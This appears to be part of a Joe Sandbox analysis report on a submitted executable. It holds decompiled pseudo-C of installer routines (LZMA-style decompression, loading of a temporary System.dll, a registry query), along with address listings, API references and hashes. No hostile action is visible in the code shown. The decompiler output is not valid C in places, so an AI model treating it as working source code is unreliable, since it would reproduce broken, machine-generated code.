											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f34
0x00406f3e
0x00406f0d
0x00406f16
0x00406f23
0x00406f26
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2e0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406943(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E00405569(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B56( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 5181804e5baa6bb61a2801b2f39576ccbdd871c020746768f7870043555f7144
Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
Opcode Fuzzy Hash: 5181804e5baa6bb61a2801b2f39576ccbdd871c020746768f7870043555f7144
Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E0040644E(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx50C8.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
